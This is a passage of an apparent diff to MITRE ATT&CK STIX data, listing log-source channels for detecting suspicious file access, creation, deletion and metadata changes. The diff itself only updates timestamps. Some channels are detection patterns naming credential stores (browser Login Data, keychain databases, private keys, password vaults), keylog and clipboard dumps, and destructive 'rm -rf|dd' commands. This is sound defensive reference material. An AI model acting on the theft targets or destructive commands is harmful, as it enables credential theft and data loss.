+                            "channel": "Kerberos framework calls to API:{uuid} cache outside normal process lineage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "~/Library/Application Support/Google/Chrome/*/Login Data OR ~/Library/Application Support/Firefox/*/logins.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Read access to Time Machine plist files or CCC configurations in ~/Library/Preferences/"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - file subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file read of sensitive directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Abnormal process access to Safari or Chrome cookie storage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open: Access to /var/log/system.log or related security event logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open/read of *.plist or .env files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read of user document directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read access to ~/Library/Keychains/login.keychain-db"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "filesystem and process events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read access to ~/Library/Keychains or history files by terminal processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access to /Volumes/SharePoint or network mount"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access to ~/Library/Safari/Bookmarks.plist or recent files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access to keychain database"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - file provider subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read/write of user documents prior to upload"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open/read access to private key files (id_rsa, *.pem, *.p12)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read: File access to /System/Library/Extensions/ or related kernel extension paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "*.opvault OR *.ldb OR *.kdbx"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Recent download opened or executed"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "Suspicious file execution on removable media path"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 18:39:07.536000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0039",
+                            "external_id": "DC0039"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Creation",
+                    "description": "A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs). ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=11"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "creat"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE/MODIFY: Modification of app.asar inside .app bundle"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "File creation with name starting with '.'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation or modification of browser extension .plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or creat syscalls targeting excluded paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file creation in AV exclusion directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file creation/modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file write/create"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "snmp:syslog",
+                            "channel": "firmware write/log event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,creat,rename: Writes in $HOME/Downloads, /tmp, ~/.cache with exe/script/archive/office extensions"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Create in /Users/*/Downloads or /private/var/folders/* with quarantine attribute"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file events"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMFS file creation"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write/open, FIM audit"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "open/write/exec calls"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .plist under /Library/Managed Preferences/"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "creat"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "disk activity on /Library/LaunchAgents or LaunchDaemons"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: Write to ~/.vscode-cli/code_tunnel.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "creation of ~/.vscode-cli/code_tunnel.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create/modify dylib files in monitored directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "New files in /tmp, /var/tmp, $HOME/.cache, executed within TimeWindow after browser HTTP fetch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "New files written to /var/folders, /tmp, ~/Library/Caches, or ~/Downloads by browser context or its children"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: New file created in system binaries or temp directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File created in ~/Library/LaunchAgents or executable directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, unlink, rename: File creation or deletion involving critical stored data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process wrote large .mov/.mp4 in user temp/hidden dirs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "logd:file write"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "File IO"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "creat, open, write on /etc/systemd/system and /usr/lib/systemd/system"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Attachment files written to ~/Downloads or temporary folders"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file activity"
+                        },
+                        {
+                            "name": "CloudTrail:PutObject",
+                            "channel": "PutObject"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "Creation of files with extensions .sql, .csv, .sqlite, especially in user directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Writes of .sql/.csv/.xlsx files to user documents/downloads"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "New .py/.js/.sh files written to ~/.local/, ~/.cache/, or /tmp/ within 5 min of package install"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write, open, or rename to /etc/systemd/system/*.service"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of .zip, .gz, .bz2 files in /tmp, /var/tmp, or /home directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip, .gz, .dmg archives in /Users, /tmp, or application directories"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file open/write"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_CREATE: path under /Users/*/(Downloads|Desktop|Library/*/Containers|Library/Group Containers) AND extension in SuspiciousExtensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/create/rename: name in (/home/*/Downloads/*|/tmp/*|/run/user/*|/media/*) AND ext in SuspiciousExtensions"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of archive files in /tmp, /var/tmp, or user home directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip, .dmg, .tar.gz files in /Users, /tmp, or application directories"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File Events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "File creations of *.qcow2, *.vdi, *.vmdk outside standard VM directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation or modification of postinstall scripts within .pkg or .mpkg contents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: File creation under /tmp, /var/tmp, ~/.cache with executable bit or shell shebang"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create: New files in /tmp or ~/Library/Application Support/* with executable or script extensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write, unlink"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "File creation of suspicious scripts/binaries in temporary directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation of unsigned binaries/scripts in user cache or download directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "File creation events in /var/mail or /var/spool/mail exceeding baseline thresholds"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "create: Attachment file creation in ~/Library/Mail directories"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Shell-Core",
+                            "channel": "New startup folder shortcut or binary placed in Startup directory"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write or create file after .bash_history access"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "new file created in /var/www/html, /srv/http, or similar web root"
+                        },
+                        {
+                            "name": "fs:launchdaemons",
+                            "channel": "file_create"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "mount target path within /proc/*"
+                        },
+                        {
+                            "name": "macos:fsevents",
+                            "channel": "/Library/StartupItems/, ~/Library/LaunchAgents/"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "write or chmod to ~/Library/LaunchAgents/*.plist"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "creation of .so files in non-standard directories (e.g., /tmp, /home/*)"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of files with anomalous headers and entropy levels in /tmp or user directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of files with anomalous headers and entropy values"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Access or modification to /lib/modules or creation of .ko files"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Directory events (kFSEventStreamEventFlagItemCreated)"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "drive.activity logs"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "create/write/rename in user-writable paths"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "WRITE: Drop of binaries/scripts in ~/.local, /tmp, or /opt tool dirs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE/MODIFY: Creation of LaunchAgents/Daemons plists in user/system locations"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,create"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Creation of hidden files (.*) in sensitive directories (/etc, /var, /usr/bin)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of LaunchAgents/LaunchDaemons in hidden or non-standard directories"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of files ending in .tar, .gz, .bz2, .zip in /tmp or /var/tmp"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip or .dmg files in user-accessible or temporary directories"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_open"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file create or modify in /etc/emond.d/rules or /private/var/db/emondClients"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,creat,rename,write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Writes under ~/Library/Application Support/Code*/extensions or JetBrains plugins"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "PutObject"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "large file write originating from /mnt/usb or external mounted storage"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 17:17:05.280000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0040",
+                            "external_id": "DC0040"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Deletion",
+                    "description": "Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink/unlinkat on service binaries or data targets"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file deletion"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell history"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=23"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "delete action"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, unlinkat, openat, write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec rm -rf|dd if=/dev|srm|file unlink"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, unlinkat, rmdir"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, rename, open"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=23"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "unlink, fs_delete"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "container file operations"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "rm, clearlogs, logrotate"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Datastore file operations"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE, DELETE, WRITE: Stored data manipulation attempts by unauthorized processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink/unlinkat"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Backup",
+                            "channel": "Windows Backup Catalog deletion or catalog corruption"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "/etc/fstab, /etc/systemd/*"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-23 18:19:16.114000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0059",
+                            "external_id": "DC0059"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Metadata",
+                    "description": "contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples: \n\n- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\\Windows\\System32\\config\\SAM on Windows.\n- Timestamps: Analyzing the creation, modification, and access timestamps of a file.\n- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.\n- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.\n- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.\n- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "stat and lstat syscall results on files, including inode and permission info"
+                        },
+                        {
+                            "name": "AndroidLogs:Framework",
+                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "chmod or chown of hook files indicating privilege escalation or execution permission change"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file path matches exclusion directories"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file path modifications on critical system directories (/etc, /usr/bin, /usr/sbin, /var, /opt)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Inotify watch creation or auditctl changes on /etc/cron* or /lib/systemd/system/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file write after sleep delay"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, setxattr, lsetxattr, fsetxattr)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setuid or setgid bit changes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, lchown, setxattr, lsetxattr, fsetxattr, removexattr, lremovexattr, fremovexattr)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setxattr or getxattr system call"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, chown, setxattr, or file writes to /etc/ssl/* or /usr/local/share/ca-certificates/*"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "Unexpected container volume unmount + file deletion"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "App reputation telemetry"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "File Metadata Inspection (Low String Entropy, Missing PDB)"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "File Metadata Analysis (PE overlays, entropy)"
+                        },
+                        {
+                            "name": "esxi:hostd",
